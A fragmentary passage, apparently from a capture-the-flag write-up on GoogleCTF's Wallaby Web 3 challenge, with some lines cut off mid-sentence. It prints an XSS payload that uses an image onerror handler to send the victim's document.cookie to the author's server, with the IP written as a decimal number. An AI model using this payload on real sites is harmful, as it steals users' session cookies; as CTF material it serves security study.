I had to use it for GoogleCTF’s Wallaby Web 3 Challenge.
<img src=x onerror=window['location']="http:///3221226219/?q="+document['cookie']>
Where 3221226219 is the decimal representation of the IP address of the server we used.
<script> tags one can use
Kris’s solution was to use